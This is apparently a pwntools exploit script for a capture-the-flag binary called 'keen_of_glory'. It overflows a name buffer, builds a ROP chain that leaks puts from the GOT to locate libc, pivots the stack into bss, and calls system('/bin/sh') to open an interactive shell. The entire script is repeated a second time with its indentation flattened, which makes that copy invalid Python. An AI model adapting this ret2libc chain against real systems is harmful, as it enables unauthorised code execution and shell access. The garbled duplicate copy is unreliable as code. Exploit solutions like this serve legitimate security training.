birdg0/keen_of_glory2.py

## keen_of_glory2.py
from pwn import *

LOCAL = 1
DEBUG = 0
VERBOSE = 0

if VERBOSE:
    context.log_level = 'debug'
else:
    context.log_level = 'critical'

if LOCAL:
    io = process('./keen_of_glory')
    libc = ELF('./libc.so.keen_of_glory')
    if DEBUG:
        # gdb.attach(io, 'b *0x0000000000401B08 if $dx==0x56e6\n')
        # gdb.attach(io, 'b *0x000000000040233B\nb *0x0000000000402975\n')
        gdb.attach(io, 'b *0x0000000000400910\n')
else:
    pass

io.recvuntil('we have: ')
red_nums = io.recvuntil('\n')[:-1].split(' ')
red_nums = map(int, red_nums)
io.recvuntil('we have: ')
blue_nums = io.recvuntil('\n')[:-1].split(' ')
blue_nums = map(int, blue_nums)
print red_nums
print blue_nums

for i in range(3):
    io.recvuntil(':')
    io.send(p64(blue_nums[i]))

for i in range(3):
    io.recvuntil(':')
    io.send(p64(red_nums[i]))

io.recvuntil('Enter your name and share it with your friends\n')

payload = 'A' * 0x28 + p64(0xd77838af56a7dfd9) + p64(0xfa72533fd35ff645) + p64(0xe02b4be8879ce4bf)
payload += p64(0x2a611e561400f232) + p64(0xaaa9f9bfdd5b1287) + p64(0x3e12a21244276359) + p64(0x94b16b5556a5d64e)
payload += p64(0x0f5ab16a286765d3) + p64(0x491c04733078ab68) + p16(0xc489) + p16(0x56e6)
payload += 'A' * 0x2c + p64(0x28) + 'A' * 0x50

pop_rbp = 0x0000000000400910
pop_rdi = 0x0000000000437173
leave_ret = 0x0000000000409762
puts_got = 0x000000000063A028
puts_plt = 0x00000000004007B0
init_pop_gadget = 0x000000000043716A
init_call_gadget = 0x0000000000437150
read_got = 0x000000000063A060
bss_addr = 0x63a800

payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt)
payload += p64(init_pop_gadget) + p64(0) + p64(1) + p64(read_got) + p64(0x100) + p64(bss_addr) + p64(0)
payload += p64(init_call_gadget) + p64(0) * 7
payload += p64(pop_rbp) + p64(bss_addr) + p64(leave_ret)

io.sendline(payload)
io.recvuntil('Thank you! bye~\n')
puts_addr = u64(io.recvuntil('\n')[:-1].ljust(8, '\0'))
libc_addr = puts_addr - libc.symbols['puts']
system_addr = libc_addr + libc.symbols['system']
bin_sh = libc_addr + next(libc.search('/bin/sh'))
print 'puts_addr:%#x' % puts_addr
print 'libc_addr:%#x' % libc_addr
print 'system_addr:%#x' % system_addr
print 'bin_sh:%#x' % bin_sh

payload = 'A' * 8 + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
payload.ljust(0x100, 'A')
io.send(payload)

io.interactive()
	from pwn import *

	LOCAL = 1
	DEBUG = 0
	VERBOSE = 0

	if VERBOSE:
	context.log_level = 'debug'
	else:
	context.log_level = 'critical'

	if LOCAL:
	io = process('./keen_of_glory')
	libc = ELF('./libc.so.keen_of_glory')
	if DEBUG:
	# gdb.attach(io, 'b *0x0000000000401B08 if $dx==0x56e6\n')
	# gdb.attach(io, 'b 0x000000000040233B\nb 0x0000000000402975\n')
	gdb.attach(io, 'b *0x0000000000400910\n')
	else:
	pass

	io.recvuntil('we have: ')
	red_nums = io.recvuntil('\n')[:-1].split(' ')
	red_nums = map(int, red_nums)
	io.recvuntil('we have: ')
	blue_nums = io.recvuntil('\n')[:-1].split(' ')
	blue_nums = map(int, blue_nums)
	print red_nums
	print blue_nums

	for i in range(3):
	io.recvuntil(':')
	io.send(p64(blue_nums[i]))

	for i in range(3):
	io.recvuntil(':')
	io.send(p64(red_nums[i]))

	io.recvuntil('Enter your name and share it with your friends\n')

	payload = 'A' * 0x28 + p64(0xd77838af56a7dfd9) + p64(0xfa72533fd35ff645) + p64(0xe02b4be8879ce4bf)
	payload += p64(0x2a611e561400f232) + p64(0xaaa9f9bfdd5b1287) + p64(0x3e12a21244276359) + p64(0x94b16b5556a5d64e)
	payload += p64(0x0f5ab16a286765d3) + p64(0x491c04733078ab68) + p16(0xc489) + p16(0x56e6)
	payload += 'A' * 0x2c + p64(0x28) + 'A' * 0x50

	pop_rbp = 0x0000000000400910
	pop_rdi = 0x0000000000437173
	leave_ret = 0x0000000000409762
	puts_got = 0x000000000063A028
	puts_plt = 0x00000000004007B0
	init_pop_gadget = 0x000000000043716A
	init_call_gadget = 0x0000000000437150
	read_got = 0x000000000063A060
	bss_addr = 0x63a800

	payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt)
	payload += p64(init_pop_gadget) + p64(0) + p64(1) + p64(read_got) + p64(0x100) + p64(bss_addr) + p64(0)
	payload += p64(init_call_gadget) + p64(0) * 7
	payload += p64(pop_rbp) + p64(bss_addr) + p64(leave_ret)

	io.sendline(payload)
	io.recvuntil('Thank you! bye~\n')
	puts_addr = u64(io.recvuntil('\n')[:-1].ljust(8, '\0'))
	libc_addr = puts_addr - libc.symbols['puts']
	system_addr = libc_addr + libc.symbols['system']
	bin_sh = libc_addr + next(libc.search('/bin/sh'))
	print 'puts_addr:%#x' % puts_addr
	print 'libc_addr:%#x' % libc_addr
	print 'system_addr:%#x' % system_addr
	print 'bin_sh:%#x' % bin_sh

	payload = 'A' * 8 + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
	payload.ljust(0x100, 'A')
	io.send(payload)

	io.interactive()